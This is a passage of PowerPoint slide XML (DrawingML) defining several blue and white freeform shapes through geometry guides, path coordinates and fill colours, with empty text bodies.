                      <a:pt x="2" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="7"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10630" name="Freeform 37"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1268" y="2812"/>
                <a:ext cx="19" cy="92"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 6 w 19"/>
                  <a:gd name="T1" fmla="*/ 1 h 92"/>
                  <a:gd name="T2" fmla="*/ 6 w 19"/>
                  <a:gd name="T3" fmla="*/ 4 h 92"/>
                  <a:gd name="T4" fmla="*/ 4 w 19"/>
                  <a:gd name="T5" fmla="*/ 8 h 92"/>
                  <a:gd name="T6" fmla="*/ 2 w 19"/>
                  <a:gd name="T7" fmla="*/ 16 h 92"/>
                  <a:gd name="T8" fmla="*/ 1 w 19"/>
                  <a:gd name="T9" fmla="*/ 28 h 92"/>
                  <a:gd name="T10" fmla="*/ 0 w 19"/>
                  <a:gd name="T11" fmla="*/ 41 h 92"/>
                  <a:gd name="T12" fmla="*/ 0 w 19"/>
                  <a:gd name="T13" fmla="*/ 56 h 92"/>
                  <a:gd name="T14" fmla="*/ 1 w 19"/>
                  <a:gd name="T15" fmla="*/ 74 h 92"/>
                  <a:gd name="T16" fmla="*/ 5 w 19"/>
                  <a:gd name="T17" fmla="*/ 92 h 92"/>
                  <a:gd name="T18" fmla="*/ 19 w 19"/>
                  <a:gd name="T19" fmla="*/ 91 h 92"/>
                  <a:gd name="T20" fmla="*/ 18 w 19"/>
                  <a:gd name="T21" fmla="*/ 89 h 92"/>
                  <a:gd name="T22" fmla="*/ 16 w 19"/>
                  <a:gd name="T23" fmla="*/ 81 h 92"/>
                  <a:gd name="T24" fmla="*/ 15 w 19"/>
                  <a:gd name="T25" fmla="*/ 70 h 92"/>
                  <a:gd name="T26" fmla="*/ 14 w 19"/>
                  <a:gd name="T27" fmla="*/ 56 h 92"/>
                  <a:gd name="T28" fmla="*/ 13 w 19"/>
                  <a:gd name="T29" fmla="*/ 42 h 92"/>
                  <a:gd name="T30" fmla="*/ 13 w 19"/>
                  <a:gd name="T31" fmla="*/ 27 h 92"/>
                  <a:gd name="T32" fmla="*/ 15 w 19"/>
                  <a:gd name="T33" fmla="*/ 13 h 92"/>
                  <a:gd name="T34" fmla="*/ 19 w 19"/>
                  <a:gd name="T35" fmla="*/ 1 h 92"/>
                  <a:gd name="T36" fmla="*/ 19 w 19"/>
                  <a:gd name="T37" fmla="*/ 0 h 92"/>
                  <a:gd name="T38" fmla="*/ 19 w 19"/>
                  <a:gd name="T39" fmla="*/ 0 h 92"/>
                  <a:gd name="T40" fmla="*/ 19 w 19"/>
                  <a:gd name="T41" fmla="*/ 0 h 92"/>
                  <a:gd name="T42" fmla="*/ 18 w 19"/>
                  <a:gd name="T43" fmla="*/ 0 h 92"/>
                  <a:gd name="T44" fmla="*/ 16 w 19"/>
                  <a:gd name="T45" fmla="*/ 0 h 92"/>
                  <a:gd name="T46" fmla="*/ 14 w 19"/>
                  <a:gd name="T47" fmla="*/ 0 h 92"/>
                  <a:gd name="T48" fmla="*/ 11 w 19"/>
                  <a:gd name="T49" fmla="*/ 0 h 92"/>
                  <a:gd name="T50" fmla="*/ 6 w 19"/>
                  <a:gd name="T51" fmla="*/ 1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
                  <a:gd name="T79" fmla="*/ 0 h 92"/>
                  <a:gd name="T80" fmla="*/ 19 w 19"/>
                  <a:gd name="T81" fmla="*/ 92 h 9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 h="92">
                    <a:moveTo>
                      <a:pt x="6" y="1"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="6" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="1"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="3F9EFF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10631" name="Freeform 38"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1366" y="2800"/>
                <a:ext cx="27" cy="103"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 27 w 27"/>
                  <a:gd name="T1" fmla="*/ 0 h 103"/>
                  <a:gd name="T2" fmla="*/ 26 w 27"/>
                  <a:gd name="T3" fmla="*/ 2 h 103"/>
                  <a:gd name="T4" fmla="*/ 25 w 27"/>
                  <a:gd name="T5" fmla="*/ 4 h 103"/>
                  <a:gd name="T6" fmla="*/ 22 w 27"/>
                  <a:gd name="T7" fmla="*/ 10 h 103"/>
                  <a:gd name="T8" fmla="*/ 20 w 27"/>
                  <a:gd name="T9" fmla="*/ 18 h 103"/>
                  <a:gd name="T10" fmla="*/ 18 w 27"/>
                  <a:gd name="T11" fmla="*/ 32 h 103"/>
                  <a:gd name="T12" fmla="*/ 16 w 27"/>
                  <a:gd name="T13" fmla="*/ 49 h 103"/>
                  <a:gd name="T14" fmla="*/ 18 w 27"/>
                  <a:gd name="T15" fmla="*/ 73 h 103"/>
                  <a:gd name="T16" fmla="*/ 20 w 27"/>
                  <a:gd name="T17" fmla="*/ 103 h 103"/>
                  <a:gd name="T18" fmla="*/ 5 w 27"/>
                  <a:gd name="T19" fmla="*/ 103 h 103"/>
                  <a:gd name="T20" fmla="*/ 5 w 27"/>
                  <a:gd name="T21" fmla="*/ 101 h 103"/>
                  <a:gd name="T22" fmla="*/ 4 w 27"/>
                  <a:gd name="T23" fmla="*/ 92 h 103"/>
                  <a:gd name="T24" fmla="*/ 2 w 27"/>
                  <a:gd name="T25" fmla="*/ 80 h 103"/>
                  <a:gd name="T26" fmla="*/ 1 w 27"/>
                  <a:gd name="T27" fmla="*/ 65 h 103"/>
                  <a:gd name="T28" fmla="*/ 0 w 27"/>
                  <a:gd name="T29" fmla="*/ 47 h 103"/>
                  <a:gd name="T30" fmla="*/ 1 w 27"/>
                  <a:gd name="T31" fmla="*/ 31 h 103"/>
                  <a:gd name="T32" fmla="*/ 4 w 27"/>
                  <a:gd name="T33" fmla="*/ 14 h 103"/>
                  <a:gd name="T34" fmla="*/ 9 w 27"/>
                  <a:gd name="T35" fmla="*/ 0 h 103"/>
                  <a:gd name="T36" fmla="*/ 27 w 27"/>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103"/>
                  <a:gd name="T59" fmla="*/ 27 w 27"/>
                  <a:gd name="T60" fmla="*/ 103 h 10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103">
                    <a:moveTo>
                      <a:pt x="27" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="26" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="0"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="3F9EFF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10632" name="Freeform 39"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1268" y="2817"/>
                <a:ext cx="18" cy="80"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 6 w 18"/>
                  <a:gd name="T1" fmla="*/ 2 h 80"/>
                  <a:gd name="T2" fmla="*/ 6 w 18"/>
                  <a:gd name="T3" fmla="*/ 3 h 80"/>
                  <a:gd name="T4" fmla="*/ 5 w 18"/>
                  <a:gd name="T5" fmla="*/ 8 h 80"/>
                  <a:gd name="T6" fmla="*/ 2 w 18"/>
                  <a:gd name="T7" fmla="*/ 15 h 80"/>
                  <a:gd name="T8" fmla="*/ 1 w 18"/>
                  <a:gd name="T9" fmla="*/ 24 h 80"/>
                  <a:gd name="T10" fmla="*/ 0 w 18"/>
                  <a:gd name="T11" fmla="*/ 36 h 80"/>
                  <a:gd name="T12" fmla="*/ 1 w 18"/>
                  <a:gd name="T13" fmla="*/ 50 h 80"/>
                  <a:gd name="T14" fmla="*/ 2 w 18"/>
                  <a:gd name="T15" fmla="*/ 65 h 80"/>
                  <a:gd name="T16" fmla="*/ 5 w 18"/>
                  <a:gd name="T17" fmla="*/ 80 h 80"/>
                  <a:gd name="T18" fmla="*/ 16 w 18"/>
                  <a:gd name="T19" fmla="*/ 80 h 80"/>
                  <a:gd name="T20" fmla="*/ 16 w 18"/>
                  <a:gd name="T21" fmla="*/ 78 h 80"/>
                  <a:gd name="T22" fmla="*/ 15 w 18"/>
                  <a:gd name="T23" fmla="*/ 71 h 80"/>
                  <a:gd name="T24" fmla="*/ 14 w 18"/>
                  <a:gd name="T25" fmla="*/ 62 h 80"/>
                  <a:gd name="T26" fmla="*/ 13 w 18"/>
                  <a:gd name="T27" fmla="*/ 50 h 80"/>
                  <a:gd name="T28" fmla="*/ 12 w 18"/>
                  <a:gd name="T29" fmla="*/ 37 h 80"/>
                  <a:gd name="T30" fmla="*/ 12 w 18"/>
                  <a:gd name="T31" fmla="*/ 24 h 80"/>
                  <a:gd name="T32" fmla="*/ 14 w 18"/>
                  <a:gd name="T33" fmla="*/ 11 h 80"/>
                  <a:gd name="T34" fmla="*/ 18 w 18"/>
                  <a:gd name="T35" fmla="*/ 1 h 80"/>
                  <a:gd name="T36" fmla="*/ 18 w 18"/>
                  <a:gd name="T37" fmla="*/ 1 h 80"/>
                  <a:gd name="T38" fmla="*/ 18 w 18"/>
                  <a:gd name="T39" fmla="*/ 1 h 80"/>
                  <a:gd name="T40" fmla="*/ 18 w 18"/>
                  <a:gd name="T41" fmla="*/ 1 h 80"/>
                  <a:gd name="T42" fmla="*/ 16 w 18"/>
                  <a:gd name="T43" fmla="*/ 0 h 80"/>
                  <a:gd name="T44" fmla="*/ 15 w 18"/>
                  <a:gd name="T45" fmla="*/ 0 h 80"/>
                  <a:gd name="T46" fmla="*/ 13 w 18"/>
                  <a:gd name="T47" fmla="*/ 0 h 80"/>
                  <a:gd name="T48" fmla="*/ 9 w 18"/>
                  <a:gd name="T49" fmla="*/ 1 h 80"/>
                  <a:gd name="T50" fmla="*/ 6 w 18"/>
                  <a:gd name="T51" fmla="*/ 2 h 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
                  <a:gd name="T79" fmla="*/ 0 h 80"/>
                  <a:gd name="T80" fmla="*/ 18 w 18"/>
                  <a:gd name="T81" fmla="*/ 80 h 8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 h="80">
                    <a:moveTo>
                      <a:pt x="6" y="2"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="6" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="2"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="59B2FF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10633" name="Freeform 40"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1269" y="2823"/>
                <a:ext cx="14" cy="69"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 5 w 14"/>
                  <a:gd name="T1" fmla="*/ 1 h 69"/>
                  <a:gd name="T2" fmla="*/ 5 w 14"/>
                  <a:gd name="T3" fmla="*/ 2 h 69"/>
                  <a:gd name="T4" fmla="*/ 4 w 14"/>
                  <a:gd name="T5" fmla="*/ 7 h 69"/>
                  <a:gd name="T6" fmla="*/ 3 w 14"/>
                  <a:gd name="T7" fmla="*/ 12 h 69"/>
                  <a:gd name="T8" fmla="*/ 1 w 14"/>
                  <a:gd name="T9" fmla="*/ 21 h 69"/>
                  <a:gd name="T10" fmla="*/ 0 w 14"/>
                  <a:gd name="T11" fmla="*/ 30 h 69"/>
                  <a:gd name="T12" fmla="*/ 0 w 14"/>
                  <a:gd name="T13" fmla="*/ 42 h 69"/>
                  <a:gd name="T14" fmla="*/ 1 w 14"/>
                  <a:gd name="T15" fmla="*/ 54 h 69"/>
                  <a:gd name="T16" fmla="*/ 4 w 14"/>
                  <a:gd name="T17" fmla="*/ 69 h 69"/>
                  <a:gd name="T18" fmla="*/ 14 w 14"/>
                  <a:gd name="T19" fmla="*/ 67 h 69"/>
                  <a:gd name="T20" fmla="*/ 13 w 14"/>
                  <a:gd name="T21" fmla="*/ 66 h 69"/>
                  <a:gd name="T22" fmla="*/ 13 w 14"/>
                  <a:gd name="T23" fmla="*/ 60 h 69"/>
                  <a:gd name="T24" fmla="*/ 12 w 14"/>
                  <a:gd name="T25" fmla="*/ 52 h 69"/>
                  <a:gd name="T26" fmla="*/ 11 w 14"/>
                  <a:gd name="T27" fmla="*/ 42 h 69"/>
                  <a:gd name="T28" fmla="*/ 10 w 14"/>
                  <a:gd name="T29" fmla="*/ 31 h 69"/>
                  <a:gd name="T30" fmla="*/ 10 w 14"/>
                  <a:gd name="T31" fmla="*/ 19 h 69"/>
                  <a:gd name="T32" fmla="*/ 12 w 14"/>
                  <a:gd name="T33" fmla="*/ 9 h 69"/>
                  <a:gd name="T34" fmla="*/ 14 w 14"/>
                  <a:gd name="T35" fmla="*/ 1 h 69"/>
                  <a:gd name="T36" fmla="*/ 14 w 14"/>
                  <a:gd name="T37" fmla="*/ 1 h 69"/>
                  <a:gd name="T38" fmla="*/ 14 w 14"/>
                  <a:gd name="T39" fmla="*/ 0 h 69"/>
                  <a:gd name="T40" fmla="*/ 14 w 14"/>
                  <a:gd name="T41" fmla="*/ 0 h 69"/>
                  <a:gd name="T42" fmla="*/ 14 w 14"/>
                  <a:gd name="T43" fmla="*/ 0 h 69"/>
                  <a:gd name="T44" fmla="*/ 13 w 14"/>
                  <a:gd name="T45" fmla="*/ 0 h 69"/>
                  <a:gd name="T46" fmla="*/ 11 w 14"/>
                  <a:gd name="T47" fmla="*/ 0 h 69"/>
                  <a:gd name="T48" fmla="*/ 8 w 14"/>
                  <a:gd name="T49" fmla="*/ 0 h 69"/>
                  <a:gd name="T50" fmla="*/ 5 w 14"/>
                  <a:gd name="T51" fmla="*/ 1 h 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
                  <a:gd name="T79" fmla="*/ 0 h 69"/>
                  <a:gd name="T80" fmla="*/ 14 w 14"/>
                  <a:gd name="T81" fmla="*/ 69 h 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 h="69">
                    <a:moveTo>
                      <a:pt x="5" y="1"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="5" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="1"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="72C6FF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10634" name="Freeform 41"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1270" y="2828"/>
                <a:ext cx="12" cy="56"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 4 w 12"/>
                  <a:gd name="T1" fmla="*/ 2 h 56"/>
                  <a:gd name="T2" fmla="*/ 3 w 12"/>
                  <a:gd name="T3" fmla="*/ 2 h 56"/>
                  <a:gd name="T4" fmla="*/ 3 w 12"/>
                  <a:gd name="T5" fmla="*/ 5 h 56"/>
                  <a:gd name="T6" fmla="*/ 2 w 12"/>
                  <a:gd name="T7" fmla="*/ 11 h 56"/>
                  <a:gd name="T8" fmla="*/ 0 w 12"/>
                  <a:gd name="T9" fmla="*/ 17 h 56"/>
                  <a:gd name="T10" fmla="*/ 0 w 12"/>
                  <a:gd name="T11" fmla="*/ 25 h 56"/>
                  <a:gd name="T12" fmla="*/ 0 w 12"/>
                  <a:gd name="T13" fmla="*/ 35 h 56"/>
                  <a:gd name="T14" fmla="*/ 2 w 12"/>
                  <a:gd name="T15" fmla="*/ 46 h 56"/>
                  <a:gd name="T16" fmla="*/ 3 w 12"/>
                  <a:gd name="T17" fmla="*/ 56 h 56"/>
                  <a:gd name="T18" fmla="*/ 11 w 12"/>
                  <a:gd name="T19" fmla="*/ 56 h 56"/>
                  <a:gd name="T20" fmla="*/ 11 w 12"/>
                  <a:gd name="T21" fmla="*/ 55 h 56"/>
                  <a:gd name="T22" fmla="*/ 10 w 12"/>
                  <a:gd name="T23" fmla="*/ 51 h 56"/>
                  <a:gd name="T24" fmla="*/ 10 w 12"/>
                  <a:gd name="T25" fmla="*/ 44 h 56"/>
                  <a:gd name="T26" fmla="*/ 9 w 12"/>
                  <a:gd name="T27" fmla="*/ 35 h 56"/>
                  <a:gd name="T28" fmla="*/ 7 w 12"/>
                  <a:gd name="T29" fmla="*/ 26 h 56"/>
                  <a:gd name="T30" fmla="*/ 9 w 12"/>
                  <a:gd name="T31" fmla="*/ 17 h 56"/>
                  <a:gd name="T32" fmla="*/ 10 w 12"/>
                  <a:gd name="T33" fmla="*/ 7 h 56"/>
                  <a:gd name="T34" fmla="*/ 12 w 12"/>
                  <a:gd name="T35" fmla="*/ 0 h 56"/>
                  <a:gd name="T36" fmla="*/ 12 w 12"/>
                  <a:gd name="T37" fmla="*/ 0 h 56"/>
                  <a:gd name="T38" fmla="*/ 12 w 12"/>
                  <a:gd name="T39" fmla="*/ 0 h 56"/>
                  <a:gd name="T40" fmla="*/ 12 w 12"/>
                  <a:gd name="T41" fmla="*/ 0 h 56"/>
                  <a:gd name="T42" fmla="*/ 11 w 12"/>
                  <a:gd name="T43" fmla="*/ 0 h 56"/>
                  <a:gd name="T44" fmla="*/ 10 w 12"/>
                  <a:gd name="T45" fmla="*/ 0 h 56"/>
                  <a:gd name="T46" fmla="*/ 9 w 12"/>
                  <a:gd name="T47" fmla="*/ 0 h 56"/>
                  <a:gd name="T48" fmla="*/ 6 w 12"/>
                  <a:gd name="T49" fmla="*/ 0 h 56"/>
                  <a:gd name="T50" fmla="*/ 4 w 12"/>
                  <a:gd name="T51" fmla="*/ 2 h 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
                  <a:gd name="T79" fmla="*/ 0 h 56"/>
                  <a:gd name="T80" fmla="*/ 12 w 12"/>
                  <a:gd name="T81" fmla="*/ 56 h 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 h="56">
                    <a:moveTo>
                      <a:pt x="4" y="2"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="3" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="2"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="8CD8FF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10635" name="Freeform 42"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1270" y="2833"/>
                <a:ext cx="10" cy="46"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 4 w 10"/>
                  <a:gd name="T1" fmla="*/ 1 h 46"/>
                  <a:gd name="T2" fmla="*/ 3 w 10"/>
                  <a:gd name="T3" fmla="*/ 2 h 46"/>
                  <a:gd name="T4" fmla="*/ 3 w 10"/>
                  <a:gd name="T5" fmla="*/ 5 h 46"/>
                  <a:gd name="T6" fmla="*/ 2 w 10"/>
                  <a:gd name="T7" fmla="*/ 8 h 46"/>
                  <a:gd name="T8" fmla="*/ 2 w 10"/>
                  <a:gd name="T9" fmla="*/ 14 h 46"/>
